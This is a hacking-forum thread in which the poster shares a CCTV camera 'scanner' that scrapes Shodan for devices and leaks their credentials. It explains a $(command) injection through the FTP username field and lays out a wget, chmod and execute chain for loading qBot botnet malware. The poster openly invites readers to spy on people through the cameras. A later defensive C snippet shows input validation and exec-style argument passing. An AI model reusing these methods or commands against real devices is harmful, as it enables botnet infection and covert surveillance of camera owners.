
[Exploit] CCTV Camera Scanner
Started by ZachFarlow


ZachFarlow Offline
04-05-2017, 10:02 PM -
#1
This is for the RCE exploit that just came out about a week ago targeting CCTV cameras. Enjoy :)

PHP Code:
Usage

Centos
yum -y update
yum -y install epel-release
yum install python python3 -y

Debian/Ubuntu
sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt-get install python python3 -y

Commands:
python3 scraper.py
python3 dumper.py 1000

Ok, I wrote these scripts and it would appear there are a lot of retards here. Gonna clear up a few questions I have read.

Why are you using a specified header?
-That's in the scraper, not the exploiter. If you try and make a request to Shodan without the header you get blocked; the shitty web server on the cameras doesn't need a header.

How do I use this?
-If you're asking this question you probably shouldn't use it at all. In short, all it does at the moment is leak the usernames and passwords from these cameras. The scraper, or "scanner" as some people are calling it, all it does is scrape Shodan for the devices.

How do I load to qBot?
-If you read the documentation you will see that there is an RCE possible. I have been extensively testing this and I cannot get it to work, I'll explain below why and how. Essentially, if I can't make a botnet out of it, then I might as well let you fuckers watch people through their CCTV cameras for a laugh.


RCE:

Ok, here's the deal, the RCE works by setting the username or password of the FTP to $(command). For those who don't know, $() is a Linux thing that evaluates to the return of the command. For example, if I set the username for the FTP to $(pwd), the return of the command "pwd" returns the user, so on these cameras it returns "/root".

Getting a return from these commands is pretty simple, just have it connect to your test FTP server and then enable logging, you can view the username it attempts to connect with.

In theory, if we set the username to $(pwd), and have valid FTP credentials, it should attempt to connect to our FTP server with the username "/root"; this will prove that it has run the command "pwd". In the GitHub and other websites documenting this, it says that it does work. In practice, the web server appears to have a mini-crash, all pages go offline for ~2 min and everything is unresponsive. There is a chance the machine may be rebooting as a result of the attempted injection, I haven't thought of a way to test that.

Loading qBot on these nerds?

Pretty sure they are running some BusyBox-type OS with a standard-ish architecture, so the classic, let's compile it with every compiler known to mankind, execute them all and then pray one of them works, should be just fine.

First issue is the fact you only have 32 chars for the password, 22 in some models, and then around 20-ish for the username if you wanted to inject there. The result is, we can't just stick the massive qbot payload in the username box and say a prayer, it won't work.

My idea was to put the qbot payload line in a file stored on a server as "x", then inject the following commands:

wget 127.0.0.1/x
chmod 777 x
mv x x.sh
./x.sh

Due to character limitations we can't store it as x.sh, we have to settle for x and then rename it.

In my mind, that should work just fine, use the code I have already written to pull the credentials and then use the credentials to run this shit above ^^^

In practice that doesn't work, as I said above, the webserver dies when I try to inject a command.
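
The defensive side of the $(command) issue described in the post above, as an added example that is not part of the original post and is not the camera vendor's code: firmware that stores FTP credentials should allowlist them and hand them to the upload client as separate exec arguments, never through a shell string. The helper names, the 9-slot argv layout and the use of BusyBox ftpput at /usr/bin/ftpput are assumptions for illustration.

```c
#include <stddef.h>
#include <string.h>

#define FTP_FIELD_MAX 32  /* credential field length mentioned in the post */

/* Allowlist check for a stored FTP username or password (hypothetical
 * helper). "$(pwd)" fails on '$', '(' and ')'; backticks, ';', '|',
 * spaces and control bytes are rejected the same way. */
int ftp_field_is_safe(const char *s)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._@+-";
    size_t n;

    if (s == NULL)
        return 0;
    n = strlen(s);
    /* A leading '-' would be parsed as an option by the client. */
    if (n == 0 || n > FTP_FIELD_MAX || s[0] == '-')
        return 0;
    return strspn(s, allowed) == n;
}

/* Build an argument vector for execv() instead of a string for system().
 * With no /bin/sh in between, each field stays one literal argument and
 * is never expanded. Fills argv (9 slots, NULL-terminated) and returns 0,
 * or returns -1 if the host or a credential is rejected.
 * Assumptions: BusyBox ftpput installed at /usr/bin/ftpput; remote and
 * local paths are chosen by the firmware, not by the user. */
int build_upload_argv(const char *argv[9], const char *host,
                      const char *user, const char *pass,
                      const char *remote, const char *local)
{
    if (host == NULL || host[0] == '\0' || host[0] == '-')
        return -1;
    if (!ftp_field_is_safe(user) || !ftp_field_is_safe(pass))
        return -1;
    argv[0] = "/usr/bin/ftpput";
    argv[1] = "-u"; argv[2] = user;
    argv[3] = "-p"; argv[4] = pass;
    argv[5] = host; argv[6] = remote; argv[7] = local;
    argv[8] = NULL;
    return 0;
}
```

The exec-style argument vector is the primary fix; the allowlist is a second layer and is stricter than a real password policy would need to be.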

[NS]D1G174L Offline
04-08-2017, 05:03 PM -
#2
Pretty good real thanks for sharing!